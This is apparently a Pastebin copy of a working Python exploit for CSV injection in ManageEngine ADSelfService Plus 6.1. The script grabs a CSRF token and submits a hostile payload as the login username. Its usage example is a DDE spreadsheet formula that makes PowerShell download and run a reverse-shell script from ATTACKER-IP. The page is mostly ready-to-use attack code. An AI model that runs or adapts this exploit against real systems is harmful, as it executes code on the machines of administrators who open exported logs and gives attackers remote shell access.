Advertisement
FlyFar

ManageEngine ADSelfService Plus 6.1 - CSV Injection

Feb 13th, 2024 (edited)
58
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
Python 1.81 KB | Cybersecurity | 0 0
  1. # Exploit Title: ManageEngine ADSelfService Plus 6.1 - CSV Injection
  2. # Date: 19/05/2021
  3. # Exploit Author: Metin Yunus Kandemir
  4. # Vendor Homepage: https://www.manageengine.com/
  5. # Software Link: https://www.manageengine.com/products/self-service-password/download.html
  6. # Version: 6.1
  7. # Description: https://docs.unsafe-inline.com/0day/manageengine-adselfservice-plus-6.1-csv-injection
  8.  
  9.  
  10. import requests
  11. import sys
  12. import urllib3
  13.  
  14.  
  15. def loginReq(target,payload,getCsrf):
  16.     s = requests.Session()
  17.     data = {
  18.         "j_username": payload,
  19.         "j_password": "joker",
  20.         "domainName": "ADSelfService+Plus+Authentication",
  21.         "AUTHRULE_NAME": "ADAuthenticator",
  22.         "adscsrf": getCsrf
  23.  
  24.     }
  25.     url = "https://"+target+"/j_security_check"
  26.     req = s.post(url, data=data, allow_redirects=False, verify=False)
  27.     if req.status_code == 302:
  28.         print("[+] Sending request is successful.")
  29.         print("[+] Injected payload: %s" %payload)
  30.     else:
  31.         print("[-] Something went wrong!")
  32.         print(req.status_code)
  33.  
  34. def getCsrfToken(target, payload=None):
  35.     urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)
  36.     gUrl = "https://" + target + "/authorization.do"
  37.     getCsrf = requests.get(url=gUrl, allow_redirects=False, verify=False)
  38.     print("[*] Csrf token: %s" %getCsrf.cookies['_zcsr_tmp'])
  39.     loginReq(target,payload,getCsrf)
  40.  
  41. def main(args):
  42.     if len(args) != 3:
  43.         print("usage: %s targetIp:port payload" %(args[0]))
  44.         print("Example: python3 adSelfServiceCsv.py 192.168.1.253:9251 \"=cmd|'/C powershell.exe -c iex (New-Object Net.WebClient).DownloadString('http://ATTACKER-IP/Invoke-PowerShellTcp.ps1')'!A0\"")
  45.         sys.exit(1)
  46.     getCsrfToken(target=args[1], payload=args[2])
  47.  
  48. if __name__ == "__main__":
  49.     main(args=sys.argv)
  50.            
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement